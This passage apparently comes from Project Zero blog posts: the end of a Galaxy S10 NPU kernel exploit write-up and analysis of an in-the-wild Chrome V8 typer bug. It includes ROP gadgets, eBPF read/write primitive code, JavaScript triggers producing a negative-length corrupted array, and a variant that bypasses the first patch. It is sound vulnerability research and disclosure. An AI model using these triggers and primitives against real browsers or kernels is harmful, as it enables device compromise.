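// at the same time.
static int one_pipe[2], zero_pipe[2];

static void setup_fds(const int *wanted_bits, int count, int base_fd) {
    pipe(one_pipe);   // fds that must read as 1 bits
    pipe(zero_pipe);  // fds that must read as 0 bits
    for (int i = 0; i < count; i++)
        dup2(wanted_bits[i] ? one_pipe[0] : zero_pipe[0], base_fd + i);
}

// Later, from another thread: unblock poll_schedule_timeout() and make
// every "1 bit" dup readable at once.
static void make_one_bits_readable(void) {
    write(one_pipe[1], "A", 1);
}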

Combining all of these ideas together, we can finally control the contents of the buffer overflow, clobbering the return address (while leaving the stack guard intact!) to execute a small ROP payload.

The ultimate ROP

Finally, it's time to consider our ROP payload. Because we can write at most 15 distinct 64-bit values into the stack via our overflow (2 of which we've already used), we'll need to be careful about keeping the ROP payload small.

When I mentioned this progress to Jann, he suggested that I check the function ___bpf_prog_run(), which he described as the ultimate ROP gadget. And indeed, if your kernel has it compiled in, it does appear to be the ultimate ROP gadget!

___bpf_prog_run() is responsible for interpreting eBPF bytecode that has already been deemed safe by the eBPF verifier. As such, it provides a number of very powerful primitives, including:

  1. arbitrary control flow in the eBPF program;
  2. arbitrary memory load;
  3. arbitrary memory store;
  4. arbitrary kernel function calls with up to 5 arguments and a 64-bit return value.

So how can we start executing this function with a controlled instruction array as quickly as possible?

First, it's slightly easier to enter ___bpf_prog_run() through one of its wrappers, such as __bpf_prog_run32(). The wrapper takes just 2 arguments rather than 3, and of those, we only need to control the second:

unsigned int __bpf_prog_run32(const void *ctx, const struct bpf_insn *insn)

The insn argument is passed in register X1, which means we'll need to find a ROP gadget that will pop a value off the stack and move it into X1. Fortunately, the following gadget from the end of the current_time() function gives us control of X1 indirectly via X20:

FFFFFF8008294C20     LDP     X29, X30, [SP,#0x10+var_s0]
FFFFFF8008294C24     MOV     X0, X19
FFFFFF8008294C28     MOV     X1, X20
FFFFFF8008294C2C     LDP     X20, X19, [SP+0x10+var_10],#0x20
FFFFFF8008294C30     RET

The reason this works is that X20 was actually popped off the stack during the epilogue of core_sys_select(), which means that we already have control over X20 by the time we execute the first hijacked return. So executing this gadget will move the value we popped into X20 over to register X1. And since this gadget reads its return address from the stack, we'll also have control over where we return to next, meaning that we can jump right into __bpf_prog_run32() with our controlled X1.

The only remaining question is what value to place in X1. Fortunately, this also has a very simple answer: the ION buffers are mapped shared between userspace and the kernel, and we already disclosed their location when we leaked the uninitialized stack_fds buffer contents before. Thus, we can just write our eBPF program into the ION buffer and pass that address to __bpf_prog_run32()!

For simplicity, I had the eBPF program implement a busy-poll loop over the shared memory to execute commands on behalf of the userspace process. The eBPF program would repeatedly read a value from the ION buffer and perform either a 64-bit read, 64-bit write, or 5-argument function call based on the value that was read. This gives us an incredibly simple and reliable kernel read/write/execute primitive.
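
For illustration, a 64-bit read command in this style might look like the sketch below, written with the insn-building macros from the kernel tree's include/linux/filter.h for readability (the exploit simply writes the raw encoded instructions into the ION buffer; the offsets within the shared buffer are arbitrary choices here):

#include <linux/bpf.h>     // struct bpf_insn
#include <linux/filter.h>  // BPF_*() insn macros (kernel tree header)

// Assuming the ctx argument (loaded into R1 by __bpf_prog_run32()) is
// also pointed at the shared ION buffer:
struct bpf_insn read64_cmd[] = {
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 8),   // r2 = ion[1]: target address
    BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0),   // r3 = *(u64 *)r2: arbitrary read
    BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_3, 16),  // ion[2] = r3: result
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};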

Even though the primitive was hacky and the system was not yet stable, I decided to stop developing the exploit at this point because my read/write/execute primitive was sufficiently powerful that subsequent exploitation steps would be fully independent of the original bug. I felt that I had achieved the goal of exploring the differences between kernel exploitation on Android and iOS.

Conclusion

So, what are my takeaways from developing this Android exploit?

Overall, the quality of the hardware mitigations on the Samsung Galaxy S10 was much stronger than I had expected. My uninformed expectation about the state of hardware mitigation adoption on Android devices was that it lagged significantly behind iOS. And in broad strokes that's true: the iPhone XS's A12 SOC supports ARMv8.3-A compared to the Qualcomm Snapdragon 855's ARMv8.2-A, and the A12 includes a few Apple-custom mitigations (KTRR, APRR+PPL) not present in the Snapdragon SOC. However, the mitigation gap was substantially smaller than I had been expecting, and there were even a few ways that the Galaxy S10 supported stronger mitigations than the iPhone XS, for instance by using unprivileged load/store operations during copy_from/to_user(). And as interesting as Apple's custom mitigations are on iOS, they would not have blocked this exploit from obtaining kernel read/write.

In terms of the software, I had expected Android to provide significantly weaker and more limited kernel manipulation primitives (heap shaping, target objects to corrupt, etc) than what's provided by the Mach microkernel portion of XNU, and this also seems largely true. I suspect that part of the reason that public iOS exploits all seem to follow very similar exploit flows is that the pre- and post-exploitation primitives available to manipulate the kernel are exceptionally powerful and flexible. Having powerful manipulation primitives allows you to obtain powerful exploitation primitives more quickly, with less of the exploit flow specific to the exact constraints of the bug. In the case of this Android exploit, it's hard for me to speak generally given my lack of familiarity with the platform. I did manage to find good heap manipulation primitives, so the heap shaping part of the exploit was straightforward and generic. On the other hand, I struggled to find stack frames amenable to manipulation, which forced me to dig through lots of technical constraints to find strategies that would just barely work. As a result, the exploit flow to get kernel read/write/execute is highly specific to the underlying vulnerability until the last step. I'm thus left feeling that there are almost certainly much more elegant ways to exploit the NPU bugs than the strategy I chose.

Despite all these differences between the two platforms, I was overall quite surprised with the similarities and parallels that did emerge. Even though the final exploit flow for this NPU bug ended up being quite different, there were many echoes of the oob_timestamp exploit along the way. Thus my past experience developing iOS kernel exploits did in fact help me come up with ideas worth trying on Android, even if most of those ideas didn't pan out.

Introducing the In-the-Wild Series

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.

At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is the tracking of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be a gap in the security community’s ability to detect 0-day exploits.

Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor.

We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.

Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.

From the exploit servers, we have extracted:

  • Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.
  • Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.
  • A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android.

The four 0-days discovered in these chains have been fixed by the appropriate vendors:

  • CVE-2020-6418 - Chrome Vulnerability in TurboFan (fixed February 2020)
  • CVE-2020-0938 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1020 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1027 - Windows CSRSS Vulnerability (fixed April 2020)

We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end user's device before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine which parameters selected the "fast" or "slow" exploitation paths.

The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.

The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:

  • Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,
  • A deep look into the bug class of one of the Chrome exploits, and
  • An in-depth teardown of the Android post-exploitation code.

In addition, we are posting root cause analyses for each of the four 0-days discovered as a part of these exploit chains.

Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.

We recommend reading the posts in the following order:

  1. Introduction (this post)
  2. Chrome: Infinity Bug
  3. Chrome Exploits
  4. Android Exploits
  5. Android Post-Exploitation
  6. Windows Exploits

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 2: Chrome Infinity Bug.

In-the-Wild Series: Chrome Infinity Bug

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);
if (a > 2) {
  return 3;
}

Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);
let array = [1, 2, 3];
return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {
  deoptimize();
}
let elements = array.[[elements]];
return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true
a = a * 10;  // predicted = 0; actual = 10
let array = [1, 2, 3];
return array[a];

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {
  [...]
  // We only handle integer induction variables (otherwise ranges
  // do not apply and we cannot do anything).
  if (!initial_type.Is(typer_->cache_->kInteger) ||
      !increment_type.Is(typer_->cache_->kInteger)) {
    // Fallback to normal phi typing, but ensure monotonicity.
    // (Unfortunately, without baking in the previous type,
    // monotonicity might be violated because we might not yet have
    // retyped the incrementing operation even though the increment's
    // type might been already reflected in the induction variable
    // phi.)
    Type type = NodeProperties::IsTyped(node)
                    ? NodeProperties::GetType(node)
                    : Type::None();
    for (int i = 0; i < arity; ++i) {
      type = Type::Union(type, Operand(node, i), zone());
    }
    return type;
  }
  // If we do not have enough type information for the initial value
  // or the increment, just return the initial value's type.
  if (initial_type.IsNone() ||
      increment_type.Is(typer_->cache_->kSingletonZero)) {
    return initial_type;
  }
  [...]
  InductionVariable::ArithmeticType arithmetic_type =
      induction_var->Type();
  double min = -V8_INFINITY;
  double max = V8_INFINITY;
  double increment_min;
  double increment_max;
  if (arithmetic_type ==
      InductionVariable::ArithmeticType::kAddition) {
    increment_min = increment_type.Min();
    increment_max = increment_type.Max();
  } else {
    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,
              arithmetic_type);
    increment_min = -increment_type.Max();
    increment_max = -increment_type.Min();
  }
  if (increment_min >= 0) {
    // increasing sequence
    min = initial_type.Min();
    for (auto bound : induction_var->upper_bounds()) {
      Type bound_type = TypeOrNone(bound.bound);
      // If the type is not an integer, just skip the bound.
      if (!bound_type.Is(typer_->cache_->kInteger)) continue;
      // If the type is not inhabited, then we can take the initial
      // value.
      if (bound_type.IsNone()) {
        max = initial_type.Max();
        break;
      }
      double bound_max = bound_type.Max();
      if (bound.kind == InductionVariable::kStrict) {
        bound_max -= 1;
      }
      max = std::min(max, bound_max + increment_max);
    }
    // The upper bound must be at least the initial value's upper
    // bound.
    max = std::max(max, initial_type.Max());
  } else if (increment_max <= 0) {
    // decreasing sequence
    [...]
  } else {
    // Shortcut: If the increment can be both positive and negative,
    // the variable can go arbitrarily far, so just return integer.
    return typer_->cache_->kInteger;
  }
  [...]
  return Type::Range(min, max, typer_->zone());
}

Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.

Note that the algorithm only works with integers, otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author only had to make two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter, and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {
  var j = 0;
  var increment = 100;
  if (argument > 2) {
    increment = Infinity;
  }
  for (var i = -Infinity; i <= -Infinity; i += increment) {
    j++;
    if (j == 20) {
      break;
    }
  }
[...]

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.

Exploitation

The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For ease of reading, we've modified it to be compatible with x64 as well.

[...]
  // The comments display the current value of the variable i, the type
  // inferred by the compiler, and the machine type used to store
  // the value at each step.
  // Initially:
  // actual = NaN, inferred = (-Infinity, +Infinity)
  // representation = double
  i = Math.max(i, 0x100000800);
  // After step one:
  // actual = NaN, inferred = [0x100000800; +Infinity)
  // representation = double
  i = Math.min(0x100000801, i);
  // After step two:
  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]
  // representation = int64_t
  i -= 0x1000007fa;
  // After step three:
  // actual = -2042, inferred = [6, 7]
  // representation = int32_t
  i >>= 1;
  // After step four:
  // actual = -1021, inferred = 3
  // representation = int32_t
  i += 10;
  // After step five:
  // actual = -1011, inferred = 13
  // representation = int32_t
[...]
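
As a sanity check, the same value pipeline can be reproduced in a few lines of C on x86-64 (converting NaN to int64_t is formally undefined behavior in C, but it compiles to the CVTTSD2SI instruction discussed next):

#include <math.h>
#include <stdint.h>
#include <stdio.h>

int main(void) {
    volatile double d = NAN;          // the value flowing out of the loop
    int64_t i64 = (int64_t)d;         // CVTTSD2SI: -0x8000000000000000
    int32_t i32 = (int32_t)(uint32_t)((uint64_t)i64 - 0x1000007fa);
    printf("step three: %d\n", i32);  // -2042
    i32 >>= 1;
    printf("step four:  %d\n", i32);  // -1021
    i32 += 10;
    printf("step five:  %d\n", i32);  // -1011
    return 0;
}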

The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.

Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable) &&
      node->opcode() != IrOpcode::kFinishRegion) {
    Node* constant = TryGetConstant(jsgraph(), node);
    if (constant != nullptr) {
      ReplaceWithValue(node, constant);
      return Replace(constant);
[...]

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.
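For contrast, here is a hedged sketch (ours, not the exploit author's) of what would happen if the trigger tried to derive the required single-value type directly in step two:

// Hypothetical variant of step two that clamps i to a single value:
i = Math.max(i, 0x100000800);
i = Math.min(0x100000800, i);
// The NumberMin node's output type would now be the constant
// 0x100000800, so the constant-folding reducer would replace the node
// with a reference to that constant. The actual NaN value would never
// reach the later operations, and the type mismatch would be lost.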

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {

[...]

} else if (arity == 1) {

  Node* length = NodeProperties::GetValueInput(node, 2);

  Type length_type = NodeProperties::GetType(length);

  if (!length_type.Maybe(Type::Number())) {

    // Handle the single argument case, where we know that the value

    // cannot be a valid Array length.

    elements_kind = GetMoreGeneralElementsKind(

        elements_kind, IsHoleyElementsKind(elements_kind)

                           ? HOLEY_ELEMENTS

                           : PACKED_ELEMENTS);

    return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

  }

  if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&

      length_type.Max() <= kElementLoopUnrollLimit &&

      length_type.Min() == length_type.Max()) {

    int capacity = static_cast<int>(length_type.Max());

    return ReduceNewArray(node, length, capacity, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

[...]

When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own, less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding, the function keeps using the original argument node. The folded value is employed during initialization of the backing store, while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with a negative length and a backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the crafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.

The rest of the trigger function is provided below:

[...]

  corrupted_array = Array(i);

  corrupted_array[0] = 1.1;

  ptr_leak_array = [wasm_module, array_buffer, [...],

                    wasm_module, array_buffer]; 

  extra_array = [13.37, [...], 13.37, 1.234]; 

  return [corrupted_array, ptr_leak_array, extra_array];

}

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.
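To make steps 1 and 2 of the algorithm above more concrete, here is a minimal sketch of how such a relative read/write primitive could be built on the corrupted array; the scan bound and the helper names are our own illustration, not the exploit's code:

var parts = trigger(3);
var corrupted_array = parts[0], ptr_leak_array = parts[1], extra_array = parts[2];

// The negative length turns every bounds check into an unsigned
// comparison that always passes, so indexing past the 13-element
// backing store gives a relative heap read/write primitive.
function oob_read(slot) { return corrupted_array[slot]; }
function oob_write(slot, value) { corrupted_array[slot] = value; }

// Step 1: pattern-match for the 1.234 marker that terminates
// extra_array in order to locate the neighboring objects.
var marker_slot = -1;
for (var i = 13; i < 0x1000; i++) {
  if (oob_read(i) === 1.234) { marker_slot = i; break; }
}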

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.
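As an illustration, a minimal sketch of such a worker wrapper might look as follows; the file name, the reporting endpoint, and the failure signalling are hypothetical simplifications:

function startWorker() {
  var worker = new Worker('exploit_worker.js');  // hypothetical file name
  worker.onmessage = function(e) {
    // Forward status information from the exploit to the attacker's
    // server ('/status' is a made-up endpoint).
    navigator.sendBeacon('/status', JSON.stringify(e.data));
  };
  worker.onerror = function() {
    // Restart the worker on failure instead of giving up.
    worker.terminate();
    startWorker();
  };
}
startWorker();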

Patch 1

Even though there’s evidence that this vulnerability was originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {

  for (var i = begin; i >= end; i += step) {

    step = end - begin;

    begin >>>= 805306382;

  }

}

var buffer = new ArrayBuffer(16384);

var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {

  write(Infinity, 1, view[65536], 1);

}

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers. However, after an internal discussion, the V8 team raised the severity rating to high.

In light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:

[...]

const bool both_types_integer =

    initial_type.Is(typer_->cache_->kInteger) &&

    increment_type.Is(typer_->cache_->kInteger);

bool maybe_nan = false;

// The addition or subtraction could still produce a NaN, if the integer

// ranges touch infinity.

if (both_types_integer) {

  Type resultant_type =

      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)

          ? typer_->operation_typer()->NumberAdd(initial_type,

                                                 increment_type)

          : typer_->operation_typer()->NumberSubtract(initial_type,

                                                      increment_type);

  maybe_nan = resultant_type.Maybe(Type::NaN());

}

// We only handle integer induction variables (otherwise ranges

// do not apply and we cannot do anything).

if (!both_types_integer || maybe_nan) {

[...]

The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but is demonstrated in the proof of concept sent to Chrome. The typer takes these changes into account and reflects them in increment’s computed type. Therefore, the attacker can, for example, add a negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;

var k = 0;

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.

[...]

// If we do not have enough type information for the initial value or

// the increment, just return the initial value's type.

if (initial_type.IsNone() ||

    increment_type.Is(typer_->cache_->kSingletonZero)) {

  return initial_type;

}

// We only handle integer induction variables (otherwise ranges do not

// apply and we cannot do anything). Moreover, we don't support infinities

// in {increment_type} because the induction variable can become NaN

// through addition/subtraction of opposing infinities.

if (!initial_type.Is(typer_->cache_->kInteger) ||

    !increment_type.Is(typer_->cache_->kInteger) ||

    increment_type.Min() == -V8_INFINITY ||

    increment_type.Max() == +V8_INFINITY) {

[...]

Additionally, ReduceJSCreateArray was updated to always use the same value for both the length property and the backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

-0       + 0 => -0
[string] - 0 => [number]
[object] + 0 => [string]

As a result, the patched function provides us with an even wider choice of possible “type confusions”.

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.
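As a brief illustration of that precondition (our own minimal example, not code from the exploit):

function access(array, index) {
  return array[index];
}

var arr = [0.1, 0.2, 0.3, 0.4];
// An out-of-bounds attempt while the function still runs in the
// interpreter records feedback that later makes TurboFan emit a
// NumberLessThan comparison instead of the hardened CheckBounds node.
access(arr, 4);
// Warm the function up so that it gets optimized.
for (var i = 0; i < 100000; i++) {
  access(arr, 0);
}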

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {

  // Initially:

  // actual = 1, inferred = any

  var k = 0;

 

  arg = arg | 0;

  // After step one:

  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

 

  arg = Math.min(arg, 2);

  // After step two:

  // actual = 1, inferred = [-0x80000000, 2]

 

  arg = Math.max(arg, 1);

  // After step three:

  // actual = 1, inferred = [1, 2]

 

  if (arg == 1) {

    arg = "30";

  }

  // After step four:

  // actual = string{30}, inferred = [1, 2] or string{30}

 

  for (var i = arg; i < 0x1000; i -= 0) {

    if (++k > 1) {

      break;

    }

  }

  // After step five:

  // actual = number{30}, inferred = [1, 2] or string{30}

 

  i += 1;

  // After step six:

  // actual = 31, inferred = [2, 3]

 

  i >>= 1;

  // After step seven:

  // actual = 15, inferred = 1

 

  i += 2;

  // After step eight:

  // actual = 17, inferred = 3

 

  i >>= 1;

  // After step nine:

  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];

  return [array[i], array];

}

